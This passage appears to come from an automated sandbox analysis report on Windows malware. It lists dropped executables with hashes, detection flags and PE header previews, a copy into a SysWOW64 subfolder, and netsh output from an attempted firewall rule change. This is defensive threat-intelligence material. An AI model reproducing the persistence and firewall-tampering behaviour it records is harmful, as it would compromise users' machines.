                                                                                                                                                                                                        SHA-512:8BF6439AD6FDC8A8F48F4520FB33A4D69E014BFB70EE3E691DBC611ACA11F1FE2C4B0D3901176455E6D46B8AA661B21C93069E0ABAF78DC93284935E866B29FA
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....,._................. ...\......`3.......0....@.................................w...........................................(....................................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data................~..............@....rsrc................"..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\86C4.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):313344
                                                                                                                                                                                                        Entropy (8bit):5.391612297954252
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:3UXmSAohOX34vYHW6gl/rdGolEt1KBCLZISE8LqVpqVggjcGkNIVqI:3UWkWIvxNNkwEt1z9LoS7ITsq
                                                                                                                                                                                                        MD5:B11C5DEFDBA76C2B3EE67EE1B474389D
                                                                                                                                                                                                        SHA1:CCFA42FFB4378AFD337C14514B3EEA9BCF3FC03D
                                                                                                                                                                                                        SHA-256:6380B2CE70ACCB02DE54067A3CDFF27D87E2FAD23F36870C8F90E825E0AE8F2B
                                                                                                                                                                                                        SHA-512:D6683BC03CBF250D17D7BCE5AF562C9D94007669C2321037E644447FE5885B18461BEEAE4B8E848DEBB8DC70B1921A229CDE550ED566D0E13581DCEF2A6B65FB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8EC4.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):537088
                                                                                                                                                                                                        Entropy (8bit):5.840438491186833
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                                                                                        MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                        SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                                                                                                        SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                                                                                        SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8ED5.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):373760
                                                                                                                                                                                                        Entropy (8bit):6.990411328206368
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                                                                        MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                                                                        SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                                                                        SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                                                                        SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9A02.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):356864
                                                                                                                                                                                                        Entropy (8bit):7.848593493266229
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:v5aWbksiNTBiNg5/dEQECtD2YajndnU4aomwStqUJE0ra7yswH:v5atNTMNg5eQX2BdUcDStq+J4bwH
                                                                                                                                                                                                        MD5:6E7430832C1C24C2BF8BE746F2FE583C
                                                                                                                                                                                                        SHA1:158936951114B6A76D665935AD34F6581556FCDF
                                                                                                                                                                                                        SHA-256:972D533E4DF0786799C0E7C914AA6C04870753C10757C5D58CD874B92A7F4739
                                                                                                                                                                                                        SHA-512:79289323C1104F7483FAC9BF2BCAB5B3804C8F2315C8EDEA9D7C83C8B68B64473122F9B38627169D64A35A960A5F74A3364159CA9CB37B0A2B1BA1B41607A8C8
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ACEF.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3570176
                                                                                                                                                                                                        Entropy (8bit):7.997630766149595
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:98304:Eyu1PF0IdV1/b4gfya9kofb/4rosp08oUPQH:EjtFp/tfyOTQrosGrUP0
                                                                                                                                                                                                        MD5:DDC599DB99362A7D8642FC19ABE03871
                                                                                                                                                                                                        SHA1:11199134356D8DE145D2EE22AAC37CA8AABA8A0B
                                                                                                                                                                                                        SHA-256:5D94F66FD3315E847213E16E19DFEB008B020798CFFF1334D48AC3344B711F22
                                                                                                                                                                                                        SHA-512:E35DBE56828E804AA78FE436E1717C3A09C416DBE2873FFFC9B44393E7EC2336CE9C544E4D6011C58E7E706819AEABC027AF9A85AA2A2509BDFC39699560ABFD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.a.................$...................@....@.......................... T.....b.6.....................................|lO. .....M...................................................................................................................... ..........................@................0......................@...........&....@......................@................0......................@............1...P......................@............02......./.................@....rsrc.........M......40.............@....T3QbYgM.....`O.......1.............@....adata........T......z6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\B58B.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):905216
                                                                                                                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\BEB3.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:MS-DOS executable
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):557664
                                                                                                                                                                                                        Entropy (8bit):7.687250283474463
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                                                                                                        MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                                                                                                        SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                                                                                                        SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                                                                                                        SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CC60.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):354816
                                                                                                                                                                                                        Entropy (8bit):7.859676161369944
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:ezBkLL2NTBY2j1gmB0cR8zGnIu4TBJCb2WefmJwJS6jbMXC3DvMk7y:eKyNTa25ccRPIu49JmYt3jbM/
                                                                                                                                                                                                        MD5:DF7952A5FC82DFB2E49AE81B6A1BE135
                                                                                                                                                                                                        SHA1:4F3A8CD939FBE37426EFDA7C88FBD2E49D8F8986
                                                                                                                                                                                                        SHA-256:F04B77C60C896B33ED8FE286DE3341FC3FFD0211A987435475DC7E9D0ABCB0CC
                                                                                                                                                                                                        SHA-512:96A495E5D30E66A236C0AEA19DAEDF95B31F254E457647B6553F2D6CAE117F0A6DA2468550333FBAE3FFA94D0960E2459D2259D3B4C2598EFE49FC03E6C36F1A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^............... ....@.........................................................................ta..........4...........................................................................hd..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3... ...4..................@..@.data...$....`.......@..............@....rsrc...4............R..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\D984.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):301056
                                                                                                                                                                                                        Entropy (8bit):5.192330972647351
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                                                                                        MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                        SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                                                                                        SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                                                                                        SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\E666.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):294400
                                                                                                                                                                                                        Entropy (8bit):5.164848187454738
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
                                                                                                                                                                                                        MD5:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        SHA1:EC761F77BBE9900AED7FFA0A9303DC6801A9EFFB
                                                                                                                                                                                                        SHA-256:ADFEA20237BE615461C44FEA423D6043FC74BF1C5303EE33FCECD8ACD201291E
                                                                                                                                                                                                        SHA-512:A509F836E79276E35EE721AEB596214550E410753A122CE254CB3943EDA371713A9FE597717471BC13D884B497D767C393715C4224777F725C4F3EBED9286CAB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L......`................. ..........`3.......0....@.............................................................................(.... ...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........"...~..............@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\lagavljy.exe
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\86C4.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10543104
                                                                                                                                                                                                        Entropy (8bit):6.35786276890293
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:xLORQkvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvP:xLORQ
                                                                                                                                                                                                        MD5:7A36C0AD3083A1519CCE3A67BB377D18
                                                                                                                                                                                                        SHA1:60416774DCA16DAC538703FC0DBF17E9D5F284DA
                                                                                                                                                                                                        SHA-256:B968714F907A742E784710A566FC7178C278C074CAA95C5405D40573F35DBEBC
                                                                                                                                                                                                        SHA-512:D9ACD8081190D480227E1B61FD3C8D7AA85B687AE53AFC90E412CCA158368AC2FEDFE50F62BE25C893F90ED65AE4E22EAFEBBEE352A94680BC8EAC6548170776
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):294400
                                                                                                                                                                                                        Entropy (8bit):5.164848187454738
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
                                                                                                                                                                                                        MD5:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        SHA1:EC761F77BBE9900AED7FFA0A9303DC6801A9EFFB
                                                                                                                                                                                                        SHA-256:ADFEA20237BE615461C44FEA423D6043FC74BF1C5303EE33FCECD8ACD201291E
                                                                                                                                                                                                        SHA-512:A509F836E79276E35EE721AEB596214550E410753A122CE254CB3943EDA371713A9FE597717471BC13D884B497D767C393715C4224777F725C4F3EBED9286CAB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L......`................. ..........`3.......0....@.............................................................................(.... ...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........"...~..............@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\uufaeea:Zone.Identifier
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                        C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy)
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10543104
                                                                                                                                                                                                        Entropy (8bit):6.35786276890293
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:xLORQkvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvP:xLORQ
                                                                                                                                                                                                        MD5:7A36C0AD3083A1519CCE3A67BB377D18
                                                                                                                                                                                                        SHA1:60416774DCA16DAC538703FC0DBF17E9D5F284DA
                                                                                                                                                                                                        SHA-256:B968714F907A742E784710A566FC7178C278C074CAA95C5405D40573F35DBEBC
                                                                                                                                                                                                        SHA-512:D9ACD8081190D480227E1B61FD3C8D7AA85B687AE53AFC90E412CCA158368AC2FEDFE50F62BE25C893F90ED65AE4E22EAFEBBEE352A94680BC8EAC6548170776
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1572864
                                                                                                                                                                                                        Entropy (8bit):4.236050220640177
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:/+hTI+sxo6OWrn9KBr9JQM7W6EX4gsVhIrSXOMOEplI41x/s:GhTI+sxo6Oun9KtK6
                                                                                                                                                                                                        MD5:3A981F75C79C87C66C2E3C993FB7A1C9
                                                                                                                                                                                                        SHA1:E447E1AB82B13A9649001FA037AEDEA394BFFABF
                                                                                                                                                                                                        SHA-256:83B31472AC406793A71F32EC8192392C190E17B1C2D7D34054D38BB83AE42926
                                                                                                                                                                                                        SHA-512:555E753BD31D48649DF9BD994502ACEE6C1DF21BA8233A5474DA1705453C1C6974B9A09794C6E0ED3132DE8F630B82C5351A06A21EDFD16A1E1F1A28C87FC757
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"{ho..................................................................................................................................................................................................................................................................................................................................................c2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):3.343015280987901
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:fDe5K5pPmKgnVVeeDzeG1NKZtjeT8GVwD35N9M8B:bwKRg/eeDzeoNYtjrGVwDhM8
                                                                                                                                                                                                        MD5:491C1A22271D000AADFD943296472D2C
                                                                                                                                                                                                        SHA1:44B8CF79D15C31CFA752EB16907A33792133108C
                                                                                                                                                                                                        SHA-256:42147A6458BEDAC8A7876F60936731C57A5FB75E195C6A26F5167036C944FC0C
                                                                                                                                                                                                        SHA-512:6568F87D8F49E4AC276EBA782CCE0BE72A99345C65F0EEF985946346559FDBA5A2233BCE24F4898490DFFDD5C915A0E60E26BE8B25FF48B4F635E28521A5F409
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"{ho..................................................................................................................................................................................................................................................................................................................................................c2HvLE.N......G...........p..dE.....O......................... ..hbin................p.\..,..........nk,...jo........ ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...jo........ ........................... .......Z.......................Root........lf......Root....nk ...jo.................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...
                                                                                                                                                                                                        \Device\ConDrv
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3773
                                                                                                                                                                                                        Entropy (8bit):4.7109073551842435
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                                                                        MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                                                                        SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                                                                        SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                                                                        SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):5.164848187454738
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
